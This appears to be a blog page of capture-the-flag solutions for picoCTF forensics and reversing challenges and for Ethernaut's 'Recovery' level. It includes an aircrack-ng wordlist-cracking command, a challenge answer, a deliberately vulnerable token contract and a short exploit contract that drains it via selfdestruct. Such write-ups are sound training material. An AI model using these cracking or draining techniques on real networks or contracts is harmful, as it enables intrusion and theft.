PicoCTF - WPA-ing Out

Challenge

Tags

PicoGym Exclusive / Forensics

Description

I thought that my password was super-secret, but it turns out that passwords passed over the AIR can be CRACKED, especially if I used the same wireless network password as one in the rockyou.txt credential dump.
Use this โ€˜pcap fileโ€™ and the rockyou wordlist. The flag should be entered in the picoCTF{XXXXXX} format.

Prereguisite

Aircrack-Ng, which is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs.

Writeup

  1. Download the pcap file and rockyou wordlist.
  2. Crack
    
     aircrack-ng -w rockyou.txt wpa-ing_out.pcap
    
    

PicoCTF - WebNet1

Challenge

Tags

PicoCTF 2019 / Forensics

Description

We found this packet capture and key. Recover the flag.

Prereguisite

ssldump, which is an SSL/TLS network protocol analyzer.

Writeup

  1. Download packet capture and key.
  2. ssldump -r capture.pcap -k picopico.key -d > output
  3. vim output
  4. Search our flag.

PicoCTF - WebNet0

Challenge

Tags

PicoCTF 2019 / Forensics

Description

We found this packet capture and key. Recover the flag.

Writeup

  1. Download packet capture and key.
  2. Use Wireshark to open packet capture.
  3. Prefrence > Protocal > TLS > RSA key list edit > add key we download.
  4. Analysis TLS stream.

Reference

Decrypting TLS Streams With Wireshark: Part 1

PicoCTF - Bbbbloat

Challenge

Tags

PicoCTF 2022 / Reverse Engineering / binary /obfuscation

Writeup

  1. Download the file.
  2. We can use file command to check its type.
    
     file bbbbloat
     #bbbbloat: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=99c5c1ce06be240322c15bcabc3cd90318eb2003, for GNU/Linux 3.2.0, stripped
    
    
  3. Use IDA analysis its pseudocode. (View > Open subviews > Generate pseudocode)
  4. Execute file and answer 549255. remix

Ethernaut - 17. Recovery

Difficulty: ๐ŸŒ•๐ŸŒ•๐ŸŒ•๐ŸŒ‘๐ŸŒ‘

A contract creator has built a very simple token factory contract. Anyone can create new tokens with ease. After deploying the first token contract, the creator sent 0.001 ether to obtain more tokens. They have since lost the contract address.
This level will be completed if you can recover (or remove) the 0.001 ether from the lost contract address.

Contract

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

import '@openzeppelin/contracts/math/SafeMath.sol';

contract Recovery {

  //generate tokens
  function generateToken(string memory _name, uint256 _initialSupply) public {
    new SimpleToken(_name, msg.sender, _initialSupply);
  
  }
}

contract SimpleToken {

  using SafeMath for uint256;
  // public variables
  string public name;
  mapping (address => uint) public balances;

  // constructor
  constructor(string memory _name, address _creator, uint256 _initialSupply) public {
    name = _name;
    balances[_creator] = _initialSupply;
  }

  // collect ether in return for tokens
  receive() external payable {
    balances[msg.sender] = msg.value.mul(10);
  }

  // allow transfers of tokens
  function transfer(address _to, uint _amount) public { 
    require(balances[msg.sender] >= _amount);
    balances[msg.sender] = balances[msg.sender].sub(_amount);
    balances[_to] = _amount;
  }

  // clean up after ourselves
  function destroy(address payable _to) public {
    selfdestruct(_to);
  }
}

Writeup

  1. Get new instance.
  2. Get level instanceโ€™s address.
    
     instance
     // '0x952282e64E0DE0618E337114AA315cE3eBb1351A'
    
    
  3. Go to etherscan search this address. We can see thereโ€™s a Contract Creation record, which we can click into and get our SimpleToken contract address.
  4. Create a new contract to exploit it!
     // SPDX-License-Identifier: MIT
     pragma solidity >=0.8.0 <0.9.0;
    
     interface ISimpleToken {
         function destroy(address payable _to) external;
     }
    
     contract RecoveryExploit {
         function withdraw() public {
             ISimpleToken(YOUR_SIMPLETOKEN_ADDRESS).destroy(payable(msg.sender));
         }
     }
    
  5. Compile and deploy.
  6. Call the withdraw method in RecoveryExploit contract. SimpleToken contract will self-destruct and all remaining ether will be sent to msg.sender.
  7. Submit instance ฮพ( โœฟ๏ผžโ—กโ›)